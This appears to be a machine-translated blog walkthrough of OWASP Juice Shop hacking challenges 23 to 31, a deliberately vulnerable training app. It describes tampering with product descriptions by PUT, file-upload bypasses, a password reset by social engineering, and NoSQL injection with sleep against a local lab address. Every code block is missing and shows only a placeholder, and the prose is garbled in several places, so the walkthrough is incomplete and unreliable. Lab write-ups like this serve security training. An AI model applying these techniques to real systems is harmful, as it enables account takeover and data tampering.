IMCAFS

 Home

share your technology and add some temperature for safety

Posted by deaguero at 2020-03-08
all

Continue the content of the previous article and go down to the next level. Students who want to know how to build can refer to the first article. Look at the first part: hacking game | OWASP juice shop (1) the second part: hacking game | OWASP juice shop (2)

0x02 play

23. Product tampering

To modify the description of o-saft products, please refer to XSS Tier 3 in the 18th level, and modify the description of 0-saft products by put method. 1. Find the ID of the products first. 2. Modify the description of the product through put, as shown in the following figure.

24: vulnerable Library

Ask to tell the store which vulnerable library is in use. (please mention the exact library name and version in the comments.). It is found that sanitize-html version 1.4.2 is used in website development. The vulnerability of this version lies in

[PHP] plain text view copy code

Ask to find the hidden Easter egg, which is hidden in the FTP directory.

[PHP] plain text view copy code

Twenty six: Eye Candy

Back to the golden age of web design. Enable JavaScript console input command

[PHP] plain text view copy code

Close 27: upload size

It is required to upload files over 100kb. After boarding

[PHP] plain text view copy code

Pass 28: upload type

It is also very simple to upload non PDF files. Upload a PDF packet to modify the type of uploaded file.

29th: login Bjoern

Require Bjoern's user account to log in without changing his password, applying SQL injection, or hacking his Google account. The encrypted password can be obtained by SQL injection, but it can't be cracked. After running for a long time, the small editor didn't break it. Finally, the audit source code found the following figure.

30: reset bender & ා39; s password

The forget password feature is required to reset Bender's password. From the previous level, we can see that this is a social worker problem.

knowable

[PHP] plain text view copy code

[PHP] plain text view copy code

31. NoSQL injection tier 1

Requires the server to sleep for a period of time. This problem is very clear is to use NoSQL injection, sleep function. In http://192.168.239.128:3000/rest/product/3/reviews, three places are used as parameters for NoSQL query. The sleep (1000) is constructed so that the sleep can pass the customs.

Requires multiple product reviews to be updated at the same time. Submit via patch method

[PHP] plain text view copy code

[PHP] plain text view copy code

0x03 To be continued

The more you do, the more interesting it will be. But some points are not easy to get. I hope you can have more exchanges of different views and ideas. Some knowledge points don't study very well. Please give me some advice.

Reference link:

[PHP] plain text view copy code

© 2023